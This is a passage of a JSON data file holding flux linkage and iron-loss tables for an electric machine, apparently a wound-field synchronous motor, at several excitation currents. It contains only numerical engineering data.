[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[1.052, 6.669, 14.33, 18.26, 20.99, 22.35],
[1.052, 5.837, 13.72,
18.33, 21.04, 22.52],
[1.052, 5.219, 14.14,
18.94, 21.66, 23.18],
[1.052, 4.519, 15.07,
20.55, 23.41, 25.76],
[1.052, 4.162, 15.23,
20.83, 24.12, 25.75],
[1.052, 4.001, 14.28,
20.7, 24.61, 27.82],
[1.052, 3.951, 12.58,
16.92, 20.49, 24.27],
[1.052, 4.002, 14.27,
20.7, 24.6, 27.75],
[1.052, 4.163, 15.23,
20.82, 24.12, 25.74],
[1.052, 4.519, 15.06,
20.53, 23.29, 25.72],
[1.052, 5.216, 14.14,
18.95, 21.64, 23.19],
[1.052, 5.836, 13.73,
18.3, 21.03, 22.48],
[1.052, 6.681, 14.35, 18.28, 20.97, 22.4]]}},
{"ex_current": 1.75, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.04988, 0.043429999999999996, 0.02899, 0.0206, 0.01615, 0.01346],
[0.04988, 0.028439999999999997, 0.004986, -
0.006770000000000001, -0.012960000000000001, -0.01686],
[0.04988, 0.01363, -0.01845, -
0.03261, -0.03978, -0.04416],
[0.04988, 0.00035939999999999995, -
0.03977, -0.05518, -0.06251, -0.0669],
[0.04988, -0.01052, -0.05775, -
0.0744, -0.0817, -0.08601],
[0.04988, -0.01758, -0.07024000000000001, -
0.08683, -0.09366999999999999, -0.09748],
[0.04988, -0.01999, -0.07466, -0.09086, -
0.09768000000000002, -0.1013],
[0.04988, -0.01758, -0.07024000000000001, -
0.08683, -0.09368, -0.09748],
[0.04988, -0.01052, -0.057760000000000006, -
0.07441, -0.08170999999999999, -0.08602],
[0.04988, 0.0003583, -0.03978, -
0.05519, -0.06252, -0.06689],
[0.04988, 0.01363, -0.01845, -
0.032600000000000004, -0.03978, -0.04417],
[0.04988, 0.028439999999999997, 0.004987999999999999, -
0.006789, -0.012990000000000002, -0.016909999999999998],
[0.04988, 0.043429999999999996, 0.02899, 0.0206, 0.01615, 0.01346]],
"psiq": [[-0.0, -0.04605, -0.07433999999999999, -0.08735, -0.09369, -0.09775],
[-0.0, -0.047619999999999996, -0.07748, -
0.08843, -0.09351999999999999, -0.09681],
[-0.0, -0.045360000000000004, -
0.07429999999999999, -0.08286, -0.08646, -0.08879],
[-0.0, -0.038939999999999995, -0.06443, -
0.07068, -0.07293999999999999, -0.07437],
[-0.0, -0.028069999999999998, -0.04759, -
0.05109999999999999, -0.05203, -0.05258],
[-0.0, -0.01458, -0.024990000000000002, -
0.026850000000000002, -0.02744, -0.02779],
[-0.0, -2.466e-09, -4.237e-09, -
4.566e-09, -4.685e-09, -4.757e-09],
[0.0, 0.01458, 0.024990000000000002,
0.026850000000000002, 0.027450000000000002, 0.0278],
[0.0, 0.028069999999999998, 0.04759,
0.05109999999999999, 0.05202, 0.052570000000000006],
[0.0, 0.038939999999999995, 0.06443,
0.07068, 0.07293999999999999, 0.07436],
[0.0, 0.04537, 0.07429999999999999,
0.08288, 0.08647, 0.08878],
[0.0, 0.047619999999999996, 0.07747,
0.08843, 0.09351, 0.09682],
[0.0, 0.046040000000000005, 0.07433000000000001, 0.08735, 0.09369, 0.09777]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[60.43, 94.36, 155.0, 195.2, 216.6, 231.4],
[60.43, 74.45, 147.9,
191.1, 214.2, 230.1],
[60.43, 57.56, 146.4,
194.2, 218.9, 235.3],
[60.43, 43.02, 146.0,
195.7, 220.6, 237.2],
[60.43, 29.72, 142.1,
198.4, 225.4, 242.0],
[60.43, 21.0, 140.4,
203.8, 232.7, 250.7],
[60.43, 18.08, 140.8,
205.9, 235.8, 252.9],
[60.43, 21.01, 140.3,
203.9, 232.7, 250.7],
[60.43, 29.72, 142.1,
198.4, 225.4, 242.1],
[60.43, 43.02, 146.0,
195.6, 220.6, 237.1],
[60.43, 57.58, 146.4,
194.3, 218.7, 235.4],
[60.43, 74.48, 147.9,
191.1, 214.2, 230.2],
[60.43, 94.34, 155.0, 195.2, 216.5, 231.6]],
"stteeth_eddy": [[46.97, 64.79, 100.3, 122.0, 132.3, 139.0],
[46.97, 57.63, 97.86,
119.5, 130.2, 139.0],
[46.97, 52.61, 99.9,
123.4, 136.7, 146.4],
[46.97, 47.64, 104.1,
127.3, 138.5, 145.6],
[46.97, 40.21, 103.0,
123.3, 133.0, 140.8],
[46.97, 34.4, 98.77,
126.0, 141.3, 154.8],
[46.97, 32.33, 98.29,
129.0, 147.2, 161.3],
[46.97, 34.4, 98.77,
126.0, 141.3, 154.9],
[46.97, 40.21, 103.0,
123.4, 133.0, 140.8],
[46.97, 47.62, 104.1,
127.3, 138.5, 145.6],
[46.97, 52.64, 99.89,
123.3, 136.6, 146.4],
[46.97, 57.72, 97.89,
119.4, 130.2, 139.0],
[46.97, 64.77, 100.3, 122.0, 132.3, 139.0]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[2.903, 7.548, 14.06, 18.31, 20.9, 22.33],
[2.903, 6.202, 13.94,
18.24, 21.31, 22.75],
[2.903, 5.082, 13.72,
18.66, 21.4, 23.18],
[2.903, 4.297, 14.31,
19.92, 23.29, 25.2],
[2.903, 3.436, 14.11,
21.05, 24.36, 26.15],
[2.903, 2.943, 12.83,
21.27, 25.72, 28.89],
[2.903, 2.798, 11.94,
17.47, 20.57, 24.15],
[2.903, 2.942, 12.83,
21.26, 25.7, 28.97],
[2.903, 3.436, 14.11,
21.03, 24.38, 26.12],
[2.903, 4.297, 14.31,
19.9, 23.26, 25.15],
[2.903, 5.08, 13.72,
18.57, 21.37, 23.17],
[2.902, 6.199, 13.95,
18.22, 21.29, 22.75],
[2.902, 7.552, 14.08, 18.35, 20.93, 22.37]]}},
{"ex_current": 3.0, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.06606000000000001, 0.06309, 0.049260000000000005, 0.03574, 0.027769999999999996, 0.02284],
[0.06606000000000001, 0.05444, 0.02773,
0.008872, -0.001144, -0.007264],
[0.06606000000000001, 0.04328, 0.00456, -
0.01831, -0.029559999999999996, -0.03619],
[0.06606000000000001, 0.03245, -0.016819999999999998, -
0.04216, -0.053660000000000006, -0.06007],
[0.06606000000000001, 0.02367, -0.03459, -0.06234, -
0.07408000000000001, -0.08030999999999999],
[0.06606000000000001, 0.018019999999999998, -
0.04683, -0.07768, -0.08912, -0.09481],
[0.06606000000000001, 0.01597, -0.05144000000000001, -
0.08331000000000001, -0.09451999999999999, -0.09974999999999999],
[0.06606000000000001, 0.018019999999999998, -
0.04683, -0.07769, -0.08912, -0.09481],
[0.06606000000000001, 0.02367, -0.03458, -0.06235, -
0.07408000000000001, -0.08030999999999999],
[0.06606000000000001, 0.03245, -0.016819999999999998, -
0.04217, -0.053660000000000006, -0.060090000000000005],
[0.06606000000000001, 0.04328,
0.00456, -0.01832, -0.02957, -0.0362],
[0.06606000000000001, 0.05442999999999999,
0.027710000000000002, 0.00886, -0.001158, -0.00726],
[0.06606000000000001, 0.06309, 0.049260000000000005, 0.03574, 0.027769999999999996, 0.02284]],
"psiq": [[-0.0, -0.0358, -0.06371, -0.08229, -0.09108000000000001, -0.0962],
[-0.0, -0.03702, -0.06996, -0.08679, -
0.09365000000000001, -0.09741],
[-0.0, -0.03627, -0.07033, -
0.08399, -0.08867, -0.09099],
[-0.0, -0.03221, -0.06387, -
0.07438, -0.0771, -0.07818],
[-0.0, -0.02455, -0.04983, -0.0571, -
0.057870000000000005, -0.05772000000000001],
[-0.0, -0.01368, -0.02785, -0.03099, -
0.03094, -0.030289999999999997],
[-0.0, -2.38e-09, -4.84e-09, -
5.3170000000000006e-09, -5.283e-09, -5.131e-09],
[0.0, 0.01368, 0.027809999999999998,
0.03098, 0.03094, 0.030279999999999998],
[0.0, 0.024560000000000002, 0.049819999999999996,
0.05709, 0.057859999999999995, 0.05771],
[0.0, 0.03221, 0.06387, 0.07438, 0.07709, 0.07817],
[0.0, 0.03627, 0.07032, 0.08398, 0.08866, 0.09099],
[0.0, 0.03701, 0.06994, 0.08678,
0.09365000000000001, 0.09743],
[0.0, 0.03579, 0.06369, 0.08229, 0.09107, 0.09621]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[105.9, 124.7, 156.0, 194.7, 217.5, 232.7],
[105.9, 103.9, 139.4,
185.5, 211.2, 227.4],
[105.9, 80.0, 125.6,
182.8, 212.6, 230.7],
[105.9, 58.54, 117.0,
184.2, 214.4, 232.7],
[105.9, 40.94, 108.1,
182.9, 215.4, 234.5],
[105.9, 29.01, 94.29,
184.3, 224.1, 245.5],
[105.9, 23.74, 85.98,
186.8, 228.9, 249.7],
[105.9, 29.01, 94.27,
184.3, 224.1, 245.7],
[105.9, 40.95, 108.0,
182.9, 215.4, 234.6],
[105.9, 58.52, 116.9,
184.2, 214.4, 232.7],
[105.9, 79.98, 125.6,
182.7, 212.5, 230.8],
[105.9, 103.9, 139.3,
185.5, 211.2, 227.5],
[105.9, 124.7, 156.0, 194.7, 217.4, 232.9]],
"stteeth_eddy": [[78.46, 82.97, 98.88, 123.6, 135.1, 141.9],
[78.46, 76.35, 96.15,
119.9, 130.7, 137.9],
[78.46, 69.37, 94.12,
119.5, 132.6, 143.0],
[78.46, 65.04, 98.54,
126.5, 138.8, 146.5],
[78.46, 62.95, 107.4,
134.9, 139.8, 143.0],
[78.46, 62.16, 110.5,
139.6, 148.8, 157.5],
[78.46, 61.01, 106.7,
142.6, 156.8, 167.6],
[78.46, 62.17, 110.4,
139.6, 148.8, 157.5],
[78.46, 63.0, 107.4,
134.8, 139.7, 143.0],
[78.46, 65.02, 98.5,
126.5, 138.7, 146.5],
[78.46, 69.35, 94.07,
119.5, 132.5, 143.0],
[78.46, 76.34, 96.06,
119.8, 130.6, 138.0],
[78.46, 82.99, 98.88, 123.5, 134.8, 142.0]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[5.864, 9.013, 15.15, 18.38, 20.66, 22.48],
[5.864, 7.848, 13.64,
18.45, 21.55, 23.22],
[5.864, 6.317, 12.85,
18.47, 21.57, 23.32],
[5.864, 4.89, 12.34,
19.29, 23.06, 25.23],
[5.864, 3.856, 11.88,
20.81, 25.13, 26.87],
[5.864, 3.299, 10.93,
20.07, 26.71, 31.65],
[5.864, 3.029, 10.29,
18.14, 22.28, 25.12],
[5.864, 3.298, 10.94,
20.06, 26.68, 31.63],
[5.864, 3.857, 11.89,
20.8, 25.11, 26.86],
[5.864, 4.891, 12.34,
19.29, 23.06, 25.26],
[5.864, 6.321, 12.85,
18.47, 21.57, 23.33],
[5.864, 7.859, 13.64,
18.42, 21.5, 23.13],
[5.864, 9.029, 15.25, 18.37, 20.71, 22.49]]}},
{"ex_current": 5.13, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.07588, 0.07501, 0.07024000000000001, 0.06068, 0.04833, 0.039389999999999994],
[0.07588, 0.07077, 0.06018, 0.03832, 0.02093, 0.01016],
[0.07588, 0.06616, 0.0464,
0.012329999999999999, -0.008719, -0.02047],
[0.07588, 0.06133999999999999, 0.02976, -
0.01375, -0.03639, -0.04773],
[0.07588, 0.05692, 0.015770000000000003, -
0.03539, -0.05878, -0.06978000000000001],
[0.07588, 0.053919999999999996,
0.007412, -0.04996, -0.07556, -0.08671],
[0.07588, 0.052879999999999996,
0.00467, -0.05496, -0.08246, -0.09354],
[0.07588, 0.053919999999999996,
0.0074129999999999995, -0.04996, -0.07556, -0.08671],
[0.07588, 0.05692, 0.015770000000000003, -
0.03539, -0.05879, -0.06979],
[0.07588, 0.06133999999999999, 0.029750000000000002, -
0.013760000000000001, -0.0364, -0.04774],
[0.07588, 0.06616, 0.0464, 0.0123, -
0.008738, -0.020479999999999998],
[0.07588, 0.07077, 0.06018, 0.03831,
0.020909999999999998, 0.01014],
[0.07588, 0.07501, 0.07024000000000001, 0.06068, 0.04833, 0.039389999999999994]],
"psiq": [[-0.0, -0.027129999999999998, -0.04815, -0.06727, -0.08206, -0.09076000000000001],
[-0.0, -0.02697, -0.05079, -
0.07586999999999999, -0.08983, -0.09626],
[-0.0, -0.02496, -0.05126, -0.0782, -
0.08936000000000001, -0.09333],
[-0.0, -0.02086, -0.0466, -0.07216, -0.08029, -0.08233],
[-0.0, -0.01479, -0.035609999999999996, -
0.05727, -0.06298000000000001, -0.06353],
[-0.0, -0.007745999999999999, -0.01918, -
0.033159999999999995, -0.03577, -0.03521],
[-0.0, -1.318e-09, -3.28e-09, -5.854999999999999e-09, -
6.264000000000001e-09, -6.1e-09],
[0.0, 0.007745999999999999, 0.01917,
0.033139999999999996, 0.03576, 0.0352],
[0.0, 0.01479, 0.0356, 0.057260000000000005,
0.06297, 0.06352000000000001],
[0.0, 0.02085, 0.04659, 0.07215, 0.08028, 0.08233],
[0.0, 0.02495, 0.051250000000000004,
0.0782, 0.08936000000000001, 0.09333],
[0.0, 0.026949999999999998, 0.05077,
0.07586, 0.08983, 0.09626],
[0.0, 0.02712, 0.04814, 0.06726, 0.08207, 0.09075]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[137.5, 151.0, 175.0, 197.0, 216.6, 232.9],
[137.5, 137.5, 150.9,
177.1, 206.2, 224.6],
[137.5, 122.9, 120.0,
158.9, 198.6, 221.2],
[137.5, 108.7, 85.62,
145.3, 197.9, 222.4],
[137.5, 97.44, 58.73,
139.0, 197.5, 221.9],
[137.5, 90.18, 43.95,
132.7, 202.8, 234.5],
[137.5, 87.59, 38.27,
127.2, 211.3, 243.6],
[137.5, 90.16, 43.93,
132.7, 202.8, 234.5],
[137.5, 97.44, 58.69,
139.0, 197.4, 221.9],
[137.5, 108.7, 85.58,
145.3, 197.9, 222.5],
[137.5, 122.8, 120.0,
158.9, 198.6, 221.3],
[137.5, 137.4, 150.9,
177.1, 206.2, 224.6],
[137.5, 151.0, 175.0, 197.0, 216.6, 233.0]],
"stteeth_eddy": [[98.7, 101.2, 109.4, 121.1, 135.7, 145.4],
[98.7, 97.99, 102.5,
119.7, 132.4, 139.4],
[98.7, 96.41, 96.12,
117.1, 130.8, 138.9],
[98.7, 97.72, 92.44,
120.1, 136.8, 145.2],
[98.7, 101.9, 98.02,
140.2, 155.9, 154.4],
[98.7, 105.4, 115.1,
172.9, 187.2, 183.4],
[98.7, 106.6, 124.8,
195.1, 207.6, 204.7],
[98.7, 105.4, 115.1,
172.9, 187.1, 183.3],
[98.7, 101.9, 97.97,
140.1, 155.9, 154.4],
[98.7, 97.69, 92.42,
120.1, 136.8, 145.2],
[98.7, 96.37, 96.08,
117.0, 130.7, 138.9],
[98.7, 97.95, 102.4,
119.6, 132.4, 139.4],
[98.7, 101.2, 109.4, 121.0, 135.6, 145.7]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[8.062, 10.32, 14.44, 20.14, 22.72, 23.05],
[8.061, 9.444, 13.74,
18.97, 21.25, 23.56],
[8.062, 8.452, 12.91,
18.26, 22.18, 24.49],
[8.061, 7.441, 11.07,
18.49, 23.57, 25.38],
[8.062, 6.655, 9.287,
17.96, 25.31, 29.74],
[8.061, 6.081, 8.601,
18.25, 26.0, 31.21],
[8.062, 5.844, 8.324,
18.44, 25.83, 28.4],
[8.061, 6.08, 8.602,
18.25, 26.0, 31.21],
[8.062, 6.655, 9.291,
17.91, 25.28, 29.71],
[8.061, 7.446, 11.05,
18.51, 23.55, 25.38],
[8.062, 8.453, 12.96,
18.25, 22.12, 24.5],
[8.061, 9.47, 13.76,
18.98, 21.23, 23.52],
[8.062, 10.34, 14.44, 20.17, 22.72, 22.94]]}},
{"ex_current": 8.77, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.08098, 0.08193, 0.08176, 0.0789, 0.07303, 0.06545000000000001],
[0.08098, 0.07929, 0.07676999999999999,
0.07028, 0.05883000000000001, 0.04351],
[0.08098, 0.07646, 0.07104,
0.05959999999999999, 0.0375, 0.01421],
[0.08098, 0.07367, 0.06454, 0.04697, 0.01141, -0.01726],
[0.08098, 0.07125000000000001, 0.05817,
0.034390000000000004, -0.012769999999999998, -0.04459],
[0.08098, 0.06949999999999999, 0.053669999999999995,
0.025670000000000002, -0.0273, -0.06262000000000001],
[0.08098, 0.06883, 0.052110000000000004,
0.022699999999999998, -0.03164, -0.06885],
[0.08098, 0.06949999999999999, 0.053680000000000005,
0.025670000000000002, -0.0273, -0.06261],
[0.08098, 0.07125000000000001, 0.05817,
0.0344, -0.012750000000000001, -0.04462],
[0.08098, 0.07367, 0.06454, 0.04697, 0.0114, -0.01726],
[0.08098, 0.07646, 0.07103, 0.059590000000000004,
0.03749, 0.014190000000000001],
[0.08098, 0.07929, 0.07676999999999999,
0.07028, 0.05883000000000001, 0.04348],
[0.08098, 0.08193, 0.08176, 0.0789, 0.07303, 0.06545000000000001]],
"psiq": [[-0.0, -0.02152, -0.03751, -0.05102, -0.06352000000000001, -0.07450999999999999],
[-0.0, -0.020550000000000002, -0.037149999999999996, -
0.05337, -0.06999999999999999, -0.08442000000000001],
[-0.0, -0.0182, -0.03424, -0.05238, -
0.07393999999999999, -0.08886000000000001],
[-0.0, -0.014669999999999999, -
0.02786, -0.0455, -0.07008, -0.08296],
[-0.0, -0.010289999999999999, -0.01888, -
0.03122, -0.05364, -0.06459000000000001],
[-0.0, -0.005272, -0.009127999999999999, -
0.01506, -0.02687, -0.03466],
[-0.0, -8.856e-10, -1.498e-09, -2.4639999999999998e-09, -
4.421e-09, -5.908000000000001e-09],
[0.0, 0.005267, 0.009152, 0.01504,
0.026850000000000002, 0.034640000000000004],
[0.0, 0.010280000000000001, 0.01885,
0.03122, 0.05362, 0.06458],
[0.0, 0.014650000000000002, 0.02783,
0.04548, 0.07007, 0.08294],
[0.0, 0.01819, 0.03422, 0.052360000000000004,
0.07393999999999999, 0.08886000000000001],
[0.0, 0.02053, 0.03714, 0.05335, 0.07002, 0.08441],
[0.0, 0.0215, 0.03748, 0.051000000000000004, 0.06351, 0.0745]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[156.1, 169.3, 193.1, 212.0, 224.1, 233.4],
[156.1, 159.3, 175.6,
190.3, 202.7, 217.1],
[156.1, 148.5, 152.6,
158.8, 175.3, 200.8],
[156.1, 138.7, 128.1,
119.3, 146.3, 190.8],
[156.1, 131.2, 109.1,
83.33, 119.0, 189.5],
[156.1, 126.5, 96.73,
60.26, 101.3, 194.8],
[156.1, 124.9, 92.49,
52.81, 96.96, 201.3],
[156.1, 126.5, 96.76,
60.23, 101.3, 194.6],
[156.1, 131.2, 109.0,
83.37, 119.0, 189.5],
[156.1, 138.7, 128.0,
119.2, 146.3, 190.7],
[156.1, 148.4, 152.6,
158.7, 175.3, 200.8],
[156.1, 159.2, 175.6,
190.2, 202.7, 217.0],
[156.1, 169.3, 193.1, 212.0, 224.0, 233.3]],
"stteeth_eddy": [[110.9, 114.3, 123.6, 132.1, 137.2, 142.6],
[110.9, 113.5, 119.9,
126.0, 132.5, 141.5],
[110.9, 113.5, 116.8,
122.0, 135.2, 140.0],
[110.9, 115.1, 119.3,
125.3, 142.7, 149.8],
[110.9, 117.5, 125.5,
136.3, 166.1, 182.9],
[110.9, 119.6, 127.7,
138.8, 200.4, 240.1],
[110.9, 120.4, 127.4,
136.0, 209.4, 268.7],
[110.9, 119.6, 127.8,
138.8, 200.4, 239.9],
[110.9, 117.5, 125.3,
136.4, 166.6, 183.0],
[110.9, 115.1, 119.2,
125.2, 142.6, 149.7],
[110.9, 113.5, 116.8,
121.9, 135.2, 139.9],
[110.9, 113.5, 119.8,
125.9, 132.4, 141.5],
[110.9, 114.3, 123.6, 132.0, 136.9, 142.7]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
